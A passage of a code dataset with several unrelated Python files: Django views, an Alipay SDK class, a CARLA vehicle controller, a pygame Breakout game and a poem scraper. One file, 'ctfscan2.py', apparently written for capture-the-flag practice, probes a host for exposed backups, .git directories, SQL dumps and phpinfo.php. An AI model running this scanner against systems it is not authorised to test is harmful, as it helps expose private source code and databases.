infoForm=AdditionalForm(instance=optional)\n #messages.error(request, 'Something went wrong. Please try again or contact us!')\n return render(request, 'app/profile.html', {\n 'github_login': github_login,\n 'app_form': app_form,\n 'apps': apps,\n 'infoForm': infoForm,\n 'emailForm': emailForm,\n })\n\n\"\"\" use 'password_reset' instead\ndef change_password(request):\n user = request.user\n passwordform = PasswordChangeForm(user)\n if request.method == 'POST':\n passwordform = PasswordChangeForm(user, request.POST)\n if passwordform.is_valid():\n passwordform.save()\n update_session_auth_hash(request, passwordform.user)\n messages.success(request, 'Your password has been successfully updated!')\n return redirect('profile')\n else:\n passwordform = PasswordChangeForm(user)\n\n return render(request, 'app/change_password.html', {'passwordform': passwordform})\n\"\"\"\n\ndef oauthinfo(request):\n \"\"\"Renders a form for additional content for users authenticated with Github or Google\n\n Retrieves information from the social authentication library provided by Django and allows\n a user authenticated with an external service to provide additional information about themselves\n (organization, location, etc...) that can then be stored within the Django admin user database.\n\n * Note that while this appears to be the intention, it isn't fully implemented yet *\n\n Args:\n request: the HttpRequest corresponding to the page to be accessed.\n\n Returns:\n A render that displays the page for externally authenticated users to add information about themselves.\n \"\"\"\n if request.method == 'POST':\n return redirect('index')\n\n else:\n user = request.user\n if user.is_active:\n return redirect('index')\n else:\n try:\n github_login = user.social_auth.get(provider='github')\n except UserSocialAuth.DoesNotExist:\n github_login = None\n\n form2 = AdditionalForm()\n\n return render(request, 'app/oauthinfo.html', {'form2': form2})\n\n\ndef error500(request):\n return render(request, 'app/500.html')\n\ndef error404(request, exception, template_name='app/404.html'):\n return render(request, 'app/404.html')\n\ndef api_request(request):\n template_name = 'app/api_access.html'\n return render(request, template_name)\n\ndef videos(request):\n video = Video.objects.all()\n context = {'videos_list': video}\n return render(request, 'app/videos.html', context)\n return render(request, 'app/videos.html')\n\ndef publications_list(request):\n publication_list = Publication.objects.reverse()\n context = {'publication_list': publication_list}\n return render(request, 'app/publications_list.html', context)\n\n \n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"136294424","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass UseTime(object):\n\n def __init__(self):\n self._dimension = None\n self._times = None\n self._values = None\n\n @property\n def dimension(self):\n return self._dimension\n\n @dimension.setter\n def dimension(self, value):\n self._dimension = value\n @property\n def times(self):\n return self._times\n\n @times.setter\n def times(self, value):\n self._times = value\n @property\n def values(self):\n return self._values\n\n @values.setter\n def values(self, value):\n self._values = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.dimension:\n if hasattr(self.dimension, 'to_alipay_dict'):\n params['dimension'] = self.dimension.to_alipay_dict()\n else:\n params['dimension'] = self.dimension\n if self.times:\n if hasattr(self.times, 'to_alipay_dict'):\n params['times'] = self.times.to_alipay_dict()\n else:\n params['times'] = self.times\n if self.values:\n if hasattr(self.values, 'to_alipay_dict'):\n params['values'] = self.values.to_alipay_dict()\n else:\n params['values'] = self.values\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = UseTime()\n if 'dimension' in d:\n o.dimension = d['dimension']\n if 'times' in d:\n o.times = d['times']\n if 'values' in d:\n o.values = d['values']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/UseTime.py","file_name":"UseTime.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"121122422","text":"#!/usr/bin/env python3\n# -*- coding:utf8 -*-\n__author__ = 'Cytosine'\n\nimport sys\nimport asyncio\nimport aiohttp\n\nasync def requests_get(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n await response.read()\n if response.status != 404:\n print(f'\\033[1;32;40m[+] {response.status} {url}\\033[0m')\n else:\n print(f'[-] 404 {url}')\n\n\ndef scan(host, filenames):\n filename_extension_dic = \"\"\"\n .php.swp\n .php~\n .php.bak\n .php.old\n .php.swo\n .php.svn\n .php.zip\n .php.rar\n .php.txt\n ~\n ~1~\n ~2~\n ~3~\n .save\n .save1\n .save2\n .save3\n .bak_Edietplus\n .bak\n .back\n .war\n \"\"\"\n filename_extension_list = filename_extension_dic.strip().split()\n all_url = []\n for filename in filenames:\n for extension in filename_extension_list:\n all_url.append(f'{host}{filename}{extension}')\n all_url.append(f'{host}.{filename}{extension}')\n\n backup_and_version_dic = \"\"\"\n .git/\n .svn/\n .hg/\n 1.zip\n 1.rar\n tar.zip\n tar.rar\n web.zip\n web.rar\n web.tgz\n web1.zip\n web1.rar\n 123.zip\n 123.rar\n code.zip\n code.rar\n www.zip\n www.rar\n root.zip\n root.rar\n wwwroot.zip\n wwwroot.rar\n backup.zip\n backup.rar\n mysql.bak\n a.sql\n b.sql\n db.sql\n bdb.sql\n ddb.sql\n mysql.sql\n dump.sql\n data.sql\n backup.sql\n backup.sql.gz\n backup.sql.bz2\n backup.zip\n rss.xml\n crossdomain.xml\n phpinfo.php\n test.php\n \"\"\"\n backup_and_version_list = backup_and_version_dic.strip().split()\n for b in backup_and_version_list:\n all_url.append(f'{host}{b}')\n\n loop = asyncio.get_event_loop()\n tasks = [requests_get(u) for u in all_url]\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\n\n print('[*] Scan Finished.')\n\n pass\n\n\nif __name__ == '__main__': # 使用示例 $ python3 ctfscan2.py ctf.com index login register\n host = sys.argv[1]\n filename = sys.argv[2:]\n\n # host = 'localhost'\n # filename = ['index','login','register']\n\n if 'http' not in host:\n host = 'http://' + host\n\n if host[-1] != '/':\n host = host + '/'\n\n scan(host, filename)\n","sub_path":"ctfscan2.py","file_name":"ctfscan2.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"651868242","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 8 11:06:32 2020\n\n@author: shijiliu\n\"\"\"\n\n\nimport carla\nimport numpy as np\nfrom collections import deque\nimport time\nimport math\n\nimport control # the python-control package, install first\n\nfrom generate_path_omit_regulation import generate_path\nfrom intersection_definition import Intersection, get_traffic_lights, get_trajectory, smooth_trajectory\nfrom carla_env import CARLA_ENV # self-written class that provides help functions, should be in the same folder\nfrom configobj import ConfigObj\nfrom multiple_vehicle_control import VehicleControl\n\nimport copy\n\n# color for debug use\nred = carla.Color(255, 0, 0)\ngreen = carla.Color(0, 255, 0)\nblue = carla.Color(47, 210, 231)\ncyan = carla.Color(0, 255, 255)\nyellow = carla.Color(255, 255, 0)\norange = carla.Color(255, 162, 0)\nwhite = carla.Color(255, 255, 255)\n\nclass LeadVehicleControl(VehicleControl):\n # the LeadVehicleControl has two different modes:\n # normal full path mode: vehicle follows normal full path\n # pause mode: vehicle stop to the right of the lane,\n # waiting for the ego vehicle to come\n \n def __init__(self,env,vehicle_config, delta_seconds):\n super().__init__(env, vehicle_config, delta_seconds)\n \n # copy the full path trajectory\n self.full_path_trajectory = copy.copy(self.trajectory)\n self.full_path_index = copy.copy(self.index)\n self.full_path_ref_speed_list = copy.copy(self.ref_speed_list )\n \n # generate waypoints for pausing the car\n self._get_pause_waypoints()\n self.mode = \"normal\"\n \n def _get_pause_waypoints(self):\n '''\n generate a list of waypoints for the pause path\n the waypoints are in vehicle right-hand coordinates, the heading \n direction of the vehicle is x-axis\n\n Returns\n -------\n None.\n\n '''\n bb = self.vehicle_config[\"bounding_box\"]\n self.pause_waypoint_list = [(0.0,0.0),(bb.x, -bb.y ),(bb.x * 2,-bb.y * 2),(bb.x * 3, -bb.y * 3),(bb.x * 4, -bb.y * 3.5),(bb.x * 5, -bb.y * 3.5),(bb.x * 6, -bb.y * 3.5),(bb.x * 7, -bb.y * 3.5)]\n #[(0.0,0.0),(2 * bb.x, 0.0),(bb.x * 3,bb.y / 2),(bb.x * 4, bb.y),(bb.x * 5, bb.y * 2),(bb.x * 6, bb.y * 2),(bb.x * 8, bb.y * 2)]\n #[(0.0,0.0),(bb.x, 0.0),(bb.x * 2,-bb.y / 2),(bb.x * 3, -bb.y),(bb.x * 4, -bb.y)]\n \n def _get_unit_left_vector(self,yaw):\n # get the left vector (y axis)\n right_yaw = (yaw + 90) % 360\n rad_yaw = math.radians(right_yaw)\n left_vector = np.array([math.cos(rad_yaw),math.sin(rad_yaw)])\n left_vector = left_vector / np.linalg.norm(left_vector)\n return left_vector\n \n def _generate_pause_path(self):\n '''\n generate a path for the vehicle to right shift a certain value and then stop.\n assume the lead vehicle is always heading in the straight direction\n\n Returns\n --\n None\n '''\n # get world transform of the lead vehicle\n world_transform = self.env.get_transform_3d(self.model_uniquename)\n location = world_transform.location\n location_2d = np.array([location.x,location.y])\n forward_vector = world_transform.get_forward_vector()\n forward_vector_2d = np.array([forward_vector.x,forward_vector.y])\n left_vector_2d = self._get_unit_left_vector(world_transform.rotation.yaw)\n \n # transform local waypoints into global coordinates\n world_waypoints = []\n for pt in self.pause_waypoint_list:\n world_pt = location_2d + pt[0] * forward_vector_2d + pt[1] * left_vector_2d\n world_waypoints.append( ((world_pt[0],world_pt[1]),5.0) ) # vehicle will stop at 5 m/s\n if self.debug_vehicle:\n loc = carla.Location(x = world_pt[0],y = world_pt[1], z = 0.0)\n self.env.world.debug.draw_point(loc, size = 0.2, color = white, life_time=0.0, persistent_lines=True)\n \n # form trajectory\n smoothed_full_trajectory, ref_speed_list = get_trajectory(world_waypoints)\n \n self.pause_path_trajectory = smoothed_full_trajectory\n self.pause_path_ref_speed = ref_speed_list\n \n self.pause_path_index = 0\n \n if self.debug_vehicle:\n \n for ii in range(1,len(smoothed_full_trajectory)):\n loc1 = carla.Location(x = smoothed_full_trajectory[ii - 1][0], y = smoothed_full_trajectory[ii - 1][1], z = 0.0)\n loc2 = carla.Location(x = smoothed_full_trajectory[ii][0], y = smoothed_full_trajectory[ii][1], z = 0.0)\n self.env.world.debug.draw_arrow(loc1, loc2, thickness = 0.05, arrow_size = 0.1, color = red, life_time=0.0, persistent_lines=True)\n \n def change_mode(self, mode):\n '''\n change vehicle mode\n \n the LeadVehicleControl has two different modes:\n normal full path mode: vehicle follows normal full path\n pause mode: vehicle stop to the right of the lane,\n waiting for the ego vehicle to come\n\n Parameters\n ----------\n mode : string\n the mode. valid valuse are \"normal\",\"pause\"\n\n Returns\n -------\n None.\n\n '''\n if mode == \"normal\":\n self.index = copy.copy(self.full_path_index)\n self.ref_speed_list = copy.copy(self.full_path_ref_speed_list)\n self.trajectory = copy.copy(self.full_path_trajectory)\n self.mode = mode\n elif mode == \"pause\":\n self._generate_pause_path() # generate path when switching mode\n self.index = copy.copy(self.pause_path_index)\n self.ref_speed_list = copy.copy(self.pause_path_ref_speed)\n self.trajectory = copy.copy(self.pause_path_trajectory)\n self.mode = mode\n\n\n def pure_pursuit_control_wrapper(self):\n '''\n Apply one step control to the vehicle, store essential information for further use\n \n Note: this is an overriden version of pure_pursuit_control_wrapper\n to avoid vehicle being removed from the environment when reach the end of pause\n\n Returns\n -------\n end_trajectory : bool\n whether this vehicle reaches its end\n\n '''\n \n curr_speed = self.env.get_forward_speed(self.model_uniquename)\n vehicle_pos_2d = self.env.get_transform_2d(self.model_uniquename) # the (x,y) location and yaw angle of the vehicle\n self.speed.append(curr_speed)\n self.curr_speeds.append(curr_speed)\n \n # draw real trajectory if debug is enabled\n if self.debug_vehicle:\n self.vehicle_pose.append(vehicle_pos_2d[0])\n if len(self.vehicle_pose) == 2:\n self.env.draw_real_trajectory(self.vehicle_pose)\n \n # use pure-pursuit model to get the steer angle (in radius)\n delta, current_ref_speed, index, end_trajectory = self.pure_pursuit_control(vehicle_pos_2d, curr_speed, self.trajectory, self.ref_speed_list, self.index)\n self.index = index\n steer = np.clip(delta,-1.0,1.0)\n \n \n # If vehicle has safety distance set, check whether a vehicle is in the front\n current_ref_speed = self._obey_safety_distance(current_ref_speed)\n \n # If vehicle obey traffic lights and is going straight / turning left, check the traffic light state\n current_ref_speed = self._obey_traffic_light(current_ref_speed)\n \n #if self.debug_vehicle:\n # print(\"current_ref_speed == \",current_ref_speed)\n \n self.ref_speeds.append(current_ref_speed)\n self.reference_speed.append(current_ref_speed)\n \n # get throttle to get the next reference speed \n throttle = self.speed_control() # get the throttle control based on reference and current speed\n throttle = np.clip(throttle,0,1) # throttle value is [0,1]\n self.throttles.append(throttle) # for visualization\n \n # check whether we are reaching the destination or not\n # this part is different from the original version\n if end_trajectory and self.mode == \"normal\":\n vehicle_control = carla.VehicleControl(throttle = 0.0,steer=steer,brake = 1.0) # immediately stop the car\n self.env.apply_vehicle_control(self.model_uniquename, vehicle_control) # apply control to vehicle\n self.run = False\n self._destroy_vehicle()\n return end_trajectory\n elif end_trajectory and self.mode == \"pause\":\n vehicle_control = carla.VehicleControl(throttle = 0.0,steer=steer,brake = 1.0)\n self.env.apply_vehicle_control(self.model_uniquename, vehicle_control)\n return False\n \n \n \n # apply throttle-steer-brake control\n if curr_speed <= current_ref_speed:\n vehicle_control = carla.VehicleControl(throttle = throttle,steer=steer) \n else:\n vehicle_control = carla.VehicleControl(throttle = throttle,steer=steer,brake = 0.5)\n self.env.apply_vehicle_control(self.model_uniquename, vehicle_control) # apply control to vehicle\n return end_trajectory ","sub_path":"backend/full_path_vehicle.py","file_name":"full_path_vehicle.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"562775218","text":"\"\"\"\nAtari Breakout (with pygame) v1.0 by smartspot2\n\nNOTES:\nStarted- 6/10/16 9:36 PM\nCompleted- N/A\nLast edited- N/A\n\n\n\n\"\"\"\n\nimport pygame\nimport os\nimport random\nimport math\n\nfrom write import write\n\npyg = pygame\ndisp = pyg.display\n\n\"\"\"Set screen resolution\"\"\"\nscreen = pyg.display.set_mode((625, 480))\nscreen_rect = screen.get_rect()\ndisp.set_caption('Pong')\n\n\"\"\"Initialize variables\"\"\"\nWHITE = pyg.Color('white')\nBLACK = pyg.Color('black')\nGRAY = pyg.Color('gray')\nDARK_GRAY = pyg.Color('gray2')\nRED = pyg.Color('red')\nGREEN = pyg.Color('green')\nBLUE = pyg.Color('blue')\nYELLOW = pyg.Color('yellow')\nORANGE = pyg.Color('orange')\n\nbg_col = WHITE\nscore_col = BLACK\n\nscreen_w = screen.get_width()\nscreen_h = screen.get_height()\n\n\"\"\"Settings\"\"\"\n\nbrick_count = 71\n\nstart = 1\n\nfps = 80\n\nmove_dist = 7\nmove_dist_comp = 7\n\ndefault_ball_count = 1\n\nball_count = int(default_ball_count)\n\nball_min_speed = 6 # Default 9\nball_max_speed = 8 # Default 11\n\n\"\"\"Initialize pygame and display\"\"\"\npyg.init()\ndisp.init()\n\n\"\"\"Fill and update display\"\"\"\nscreen.fill(bg_col)\ndisp.flip()\n\n\"\"\"Convenience functions\"\"\"\ndef update():\n \"\"\"Updates screen\"\"\"\n disp.flip()\n\n\ndef clear():\n \"\"\"Clears screen\"\"\"\n screen.fill(bg_col)\n\ndef load_img(name):\n \"\"\"Loads image\"\"\"\n image_name = os.path.join('img', name)\n image = pyg.image.load(image_name)\n image_rect = image.get_rect()\n return image, image_rect\n\nclass Ball(pyg.sprite.Sprite):\n \"\"\"The ball.\"\"\"\n def __init__(self, speed):\n \"\"\"Initialize variables\"\"\"\n pyg.sprite.Sprite.__init__(self) # Initialize Sprite\n\n # Load image and image rect\n self.image, self.rect = load_img('ball.bmp')\n\n self.rect.move_ip(\n (screen_w - self.rect.x)//2,\n (screen_h - self.rect.y)//2) # Move in place\n\n self.vel = pyg.math.Vector2(\n random.uniform(0, math.pi*2), speed) # Create velocity vector\n self.speed = speed # Set speed\n self.bounce = 0 # Number of bounces; speed varies as this varies\n self.direction = 'None' # Direction of ball\n\n update() # Update screen\n\n def update(self):\n \"\"\"Updates the ball's position\"\"\"\n global b_list\n if start == 0:\n newpos = self.new_pos() # Calculates new position\n self.rect = newpos # Sets the ball's rect to the new position\n selfcollide = self.rect.colliderect\n selfcollidelist = self.rect.collidelist\n\n on_screen = screen_rect.contains(self.rect) # If the ball is onscreen\n if on_screen: # If the ball is onscreen and collides with a paddle\n if selfcollide(p1.rect):\n self.check_paddle() # Check/change ball's angle for paddles\n if selfcollidelist(brick_list) > -1:\n self.check_bricks()\n elif not on_screen: # If the ball is not onscreen\n self.check_walls() # Check/change ball's angle for walls\n\n if self.bounce % 50 == 0: #If number of bounces is divisible by 50\n self.speed += 1 #Add 1 to speed\n\n angle = math.degrees(self.vel[0]) # Change/get angle in degrees\n # If the ball is going right, set the direction to 'right'\n if 0 < abs(angle) < 90 or 270 < abs(angle) < 360:\n self.direction = 'right'\n # If the ball is going left, set the direction to 'left'\n elif 90 < abs(angle) < 270:\n self.direction = 'left'\n # Otherwise, there is a problem\n else:\n self.direction = 'none'\n elif start == 1:\n if b_list:\n b_list = [b_list[0]]\n self.rect.x, self.rect.y = p1.rect.midtop\n self.rect.x -= self.rect.w//2\n self.rect.y -= self.rect.h\n\n def check_paddle(self):\n \"\"\"\n Checks and changes the ball's angle\n when bouncing off the paddle\n \"\"\"\n \n (angle, z) = self.vel\n noise = random.uniform(-0.1, 0.1)\n\n if self.rect.colliderect(p1.rect) == 1:\n fromcenter = self.rect.midbottom[0] - p1.rect.midbottom[0]\n angle = -math.pi/2 + noise + fromcenter * (math.pi/150)\n\n self.bounce += 1\n\n self.vel = pyg.math.Vector2(angle, z)\n\n def check_walls(self):\n global start\n \"\"\"\n Checks and changes the ball's angle\n when bouncing off of walls\n \"\"\"\n \n (angle, z) = self.vel\n (dx, dy) = (z*math.cos(angle), z*math.sin(angle))\n\n if self.rect.bottom + dy > screen_h:\n start = 1\n elif self.rect.top + dy < 0:\n angle *= -1\n elif self.rect.left + dx < 0 or self.rect.right + dx > screen_w:\n angle = math.pi - angle\n\n self.bounce += 1\n\n self.vel = pyg.math.Vector2(angle, z)\n\n def check_bricks(self):\n (angle, z) = self.vel\n\n index = self.rect.collidelist(brick_list)\n if index > -1:\n brick = brick_list[index]\n selfcenter = self.rect.center\n if selfcenter[0] > brick.rect.right or \\\n selfcenter[0] < brick.rect.left:\n angle = math.pi-angle\n else:\n angle *= -1\n\n del brick_list[index]\n self.vel = pyg.math.Vector2(angle, z)\n \n\n def new_pos(self):\n \"\"\"\n Calculates the ball's new position\n \"\"\"\n (angle, z) = self.vel\n (dx, dy) = (z*math.cos(angle), z*math.sin(angle))\n while round(dx, 0) in (-1, 0, 1):\n dx += 1\n while round(dy, 0) in (-1, 0, 1):\n dy += 1\n return self.rect.move(dx, dy)\n\n def sendranddirection(self):\n (angle, z) = self.vel\n angle = random.uniform(-math.pi, math.pi)\n self.vel = pyg.math.Vector2(angle, z)\n\n\nclass Paddle(pyg.sprite.Sprite):\n def __init__(self, side):\n \"\"\"\n side: 1 = bottom\n side: 2 = top\n \"\"\"\n pyg.sprite.Sprite.__init__(self)\n self.image, self.rect = load_img('paddle.bmp')\n self.side = side\n self.determine_sides()\n\n def determine_sides(self):\n if self.side == 1:\n self.rect.move_ip(\n (screen_w - self.rect.w)//2,\n 7*(screen_h)//8 - (self.rect.h)//2)\n elif self.side == 2:\n self.rect.move_ip(\n (screen_w - self.rect.w)//2,\n (screen_h)//8 - (self.rect.h)//2)\n\n def update(self):\n keys = pyg.key.get_pressed()\n\n if keys[pyg.K_RIGHT]:\n if self.rect.right >= screen_w:\n return\n self.rect.move_ip(move_dist, 0)\n if keys[pyg.K_LEFT]:\n if self.rect.left <= 0:\n return\n self.rect.move_ip(-move_dist, 0)\n\n def comp_right(self):\n if self.rect.right + move_dist_comp >= screen_w:\n return\n self.rect.move_ip(move_dist_comp, 0)\n\n def comp_left(self):\n if self.rect.left - move_dist_comp <= 0:\n return\n self.rect.move_ip(-move_dist_comp, 0)\n\n def comp_update(self):\n dist_list = []\n for b in b_list:\n dist_x = self.rect.x - b.rect.x\n dist_y = self.rect.y - b.rect.y\n dist_list.append(math.sqrt(abs(dist_x)**2 + abs(dist_y)**2))\n\n b = b_list[dist_list.index(min(dist_list))]\n dist = self.rect.x - b.rect.x\n move = False\n\n if self.side == 1:\n if b.rect.y >= 3*screen_h//8:\n move = True\n elif self.side == 2:\n if b.rect.y <= 5*screen_h//8:\n move = True\n\n if not gamemode_reverse:\n if move or len(b_list) > 1:\n if dist < -5:\n self.comp_right()\n elif dist > 5:\n self.comp_left()\n elif not move or len(b_list) > 1:\n if dist < -200:\n self.comp_right()\n if dist > 200:\n self.comp_left()\n elif gamemode_reverse:\n if move or len(b_list) > 1:\n if (b.direction == 'right' and dist < 300):\n self.comp_left()\n elif (b.direction == 'left' and dist > -300):\n self.comp_right()\n elif b.direction == 'right' and dist < 350:\n self.comp_right()\n elif b.direction == 'left' and dist > -350:\n self.comp_left()\n elif not move or len(b_list) > 1:\n if dist < -200:\n self.comp_left()\n if dist > 200:\n self.comp_right()\n\nclass Brick(pyg.sprite.Sprite):\n def __init__(self, x, y):\n pyg.sprite.Sprite.__init__(self)\n self.image, self.rect = load_img('brick.bmp')\n self.x = x\n self.y = y\n self.w = self.rect.w\n self.h = self.rect.h\n self.rect.move_ip(x, y)\n\ndef main():\n global p1, start\n global b_list, b_sprite_list, brick_list, brick_sprite_list\n global score\n global fps, ball_count\n global p1_is_comp\n \n score = [0, 0, 0]\n\n ball_count = int(default_ball_count)\n\n p1 = Paddle(1)\n\n b_list = []\n for i in range(ball_count):\n b_list.append(Ball(random.uniform(ball_min_speed, ball_max_speed)))\n\n p1_sprite = pyg.sprite.RenderClear(p1)\n\n b_sprite_list = []\n for ball in b_list:\n b_sprite_list.append(pyg.sprite.RenderClear(ball))\n\n brick_list = []\n b_x = 0\n b_y = 0\n for i in range(brick_count):\n brick = Brick(b_x, b_y)\n brick_list.append(brick)\n if b_x > screen_w:\n b_x = b_x - screen_w - 2*brick.w\n b_y += brick.h\n b_x += brick.w\n screen.blit(brick.image, (brick.rect.x, brick.rect.y))\n update()\n print(b_x, b_y, brick)\n \n\n brick_sprite_list = []\n for brick in brick_list:\n brick_sprite_list.append(pyg.sprite.RenderClear(brick))\n \n\n clock = pyg.time.Clock()\n\n while True:\n clock.tick(fps)\n\n keys_pressed = pyg.key.get_pressed()\n\n if keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]:\n for event in pyg.event.get():\n if event.type == pyg.KEYDOWN:\n if event.key == pyg.K_MINUS:\n rand = random.randint(0, len(b_list)-1)\n if len(b_list) > 1:\n b_list.remove(b_list[rand])\n b_sprite_list.remove(b_sprite_list[rand])\n ball_count -= 1\n print('Removed ball')\n elif event.key == pyg.K_EQUALS:\n b_list.append(Ball(random.uniform(ball_min_speed, ball_max_speed)))\n b_sprite_list.append(pyg.sprite.RenderClear(b_list[-1]))\n ball_count += 1\n print('Added ball')\n\n if keys_pressed[pyg.K_LEFTBRACKET]:\n if fps > 1:\n fps -= 1\n print('Reduced fps')\n elif keys_pressed[pyg.K_RIGHTBRACKET]:\n fps += 1\n print('Increased fps')\n\n if keys_pressed[pyg.K_SPACE] and start == 1:\n b_list[0].sendranddirection()\n start = 0\n\n if keys_pressed[pyg.K_LEFTBRACKET] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n if fps > 1:\n fps -= 1\n print('Reduced fps')\n elif keys_pressed[pyg.K_RIGHTBRACKET] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n fps += 1\n print('Increased fps')\n\n if keys_pressed[pyg.K_MINUS] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n rand = random.randint(0, len(b_list)-1)\n if len(b_list) > 1:\n b_list.remove(b_list[rand])\n b_sprite_list.remove(b_sprite_list[rand])\n ball_count -= 1\n print('Removed ball')\n else:\n print('Cannot remove ball; only one left')\n elif keys_pressed[pyg.K_EQUALS] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n b_list.append(Ball(random.uniform(ball_min_speed, ball_max_speed)))\n b_sprite_list.append(pyg.sprite.RenderClear(b_list[-1]))\n ball_count += 1\n print('Added ball')\n\n ball_count = len(b_list)\n\n p1.update()\n \n for ball in b_list:\n ball.update()\n\n clear()\n screen.blit(p1.image, (p1.rect.x, p1.rect.y))\n\n for ball in b_list:\n screen.blit(ball.image, (ball.rect.x, ball.rect.y))\n\n for brick in brick_list:\n screen.blit(brick.image, (brick.x, brick.y))\n\n write(screen, 'FPS: ' + str(fps), score_col, None, 20, screen_w-75, screen_h-50)\n write(screen, 'Balls: ' + str(ball_count), score_col, None, 20, screen_w-75, screen_h-25)\n\n update()\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n","sub_path":"Atari Breakout.py","file_name":"Atari Breakout.py","file_ext":"py","file_size_in_byte":13198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"651133081","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport os\nimport re\nfrom Model.utils.WebProxyTools import WebProxyTool\n\nclass poemSpider:\n def __init__(self,base_url,dir_to_save,base_dir_for_save = None, website_to_crawl = None):\n self.website_to_crawl = website_to_crawl\n self.base_url = base_url\n self.dir_to_save = dir_to_save\n self.base_dir_for_save = base_dir_for_save\n self.num_poems = 0\n self.poems = []\n self.url_crawled = []\n\n def getPage(self,href):\n req = requests.get(url=href)\n if req.status_code == 404:\n return None\n # req.encoding = \"gb18030\" # in case of Chinese character\n req.encoding = \"gb18030\"\n html = req.text\n bf = BeautifulSoup(html, 'html.parser')\n return bf\n\n def getOnePoem(self,href):\n html = self.getPage(href)\n texts = html.find(id=\"content\")\n texts = texts.find(id=\"main\")\n texts = texts.find_all('p')\n\n content = []\n for p in texts:\n content.append(p.get_text())\n content = content[2:]\n\n return content\n\n def getPoemList(self,target):\n bf = self.getPage(target)\n if bf is None:\n return None\n texts = bf.find_all('div', class_=\"list_content\")[0]\n texts = texts.find_all('a')\n hrefs_to_crawl = []\n for a in texts:\n print(a.get_text())\n hrefs_to_crawl.append(a.get('href'))\n return hrefs_to_crawl\n\n def save(self,dir_to_save=None):\n if self.dir_to_save is None and dir_to_save is None:\n raise print(f'[log] no dir to save {self.website_to_crawl}')\n if dir_to_save is not None:\n with open(dir_to_save,'w',encoding=\"utf8\") as fout:\n json.dump(self.poems,fout,ensure_ascii=False)\n if self.dir_to_save is not None and self.dir_to_save != dir_to_save:\n with open(self.dir_to_save,\"w\",encoding=\"utf8\") as fout:\n json.dump(self.poems,fout,ensure_ascii=False)\n\nclass poemSanwenji(poemSpider):\n def __init__(self , base_url, dir_to_save=os.path.join(r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem','sanwenji/sanwenji.json'),base_dir_for_save = r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem',kind_url=None,base_name=None, website_to_crawl ='散文集网' ):\n super(poemSanwenji,self).__init__(base_url, dir_to_save, base_dir_for_save ,website_to_crawl = website_to_crawl)\n\n def getPage(self,href):\n req = requests.get(url=href)\n if req.status_code == 404:\n return None\n # req.encoding = \"gb18030\" # in case of Chinese character\n req.encoding = \"gb18030\"\n html = req.text\n bf = BeautifulSoup(html, 'html.parser')\n return bf\n\n def getOnePoem(self,href):\n html = self.getPage(href)\n texts = html.select('div[class=\"article_content\"]')[\n 0] # 用select不要用find_all() ,后者返回的是一个NavigableString类型,而不是tag不能进行继续的检索\n texts = texts.select('p')\n content = []\n for p in texts:\n content.append(p.get_text())\n # content = content[2:]\n poem_title = []\n texts_article_title = html.select('div[class=\"article_tit\"]')[0]\n texts_article_title = texts_article_title.select('a')[0].get_text()\n poem_title.append(texts_article_title)\n poem = poem_title + ['。'] + content\n return poem_title , content\n\n def getPoemList(self,target):\n bf = self.getPage(target)\n if bf is None:\n return None\n texts = bf.find_all('div', class_=\"list_content\")[0]\n texts = texts.find_all('a')\n hrefs_to_crawl = []\n for a in texts:\n print(a.get_text())\n hrefs_to_crawl.append(a.get('href'))\n return hrefs_to_crawl\n\n def getOneKindPoem(self,base_url, save_dir_base,cur_poem_class):\n pre = base_url\n # pre = \"http://www.sanwenji.cn/sanwen/sanwen/shanggan/list_\"\n post = \".html\"\n for number in range(1, 20):\n print(\"number = \", number)\n url = pre + str(number) + post\n hrefs_to_crawl = self.getPoemList(url)\n if hrefs_to_crawl is None:\n break\n for i, ele in enumerate(hrefs_to_crawl):\n print(\"number = \", number, \" i= \", i)\n if ele in self.url_crawled:\n continue\n self.url_crawled.append(ele)\n poem_title, poem_content = self.getOnePoem(ele)\n onePoem = poem_title + ['。'] + poem_content\n if len(onePoem) == 0:\n print(\"ele = \", ele)\n continue\n self.num_poems +=1\n temp_dict = {\"poem_id\":self.num_poems,\n 'poem_title':'\\n'.join(poem_title),\n 'origin_poem':\"\\n\".join(poem_content),\n 'poem_class':cur_poem_class,\n 'url':ele,\n 'website_name':self.website_to_crawl\n }\n self.poems.append(temp_dict)\n\n '''\n 下面是将这篇散文保存到一个文件的逻辑\n '''\n if self.base_dir_for_save:\n save_dir_base = os.path.join(self.base_dir_for_save,save_dir_base)\n if not os.path.exists(save_dir_base):\n os.makedirs(save_dir_base)\n print(\"save_dir_base\",save_dir_base)\n filename = save_dir_base + str(number) + \"__\" + str(i)\n print(\"filename = \", filename)\n with open(filename + \".txt\", \"w\", encoding=\"utf8\") as fout:\n fout.write(\"\\n\".join(onePoem))\n # with open(filename + '.pkl', \"wb\") as fout:\n # pickle.dump(onePoem, fout)\n # 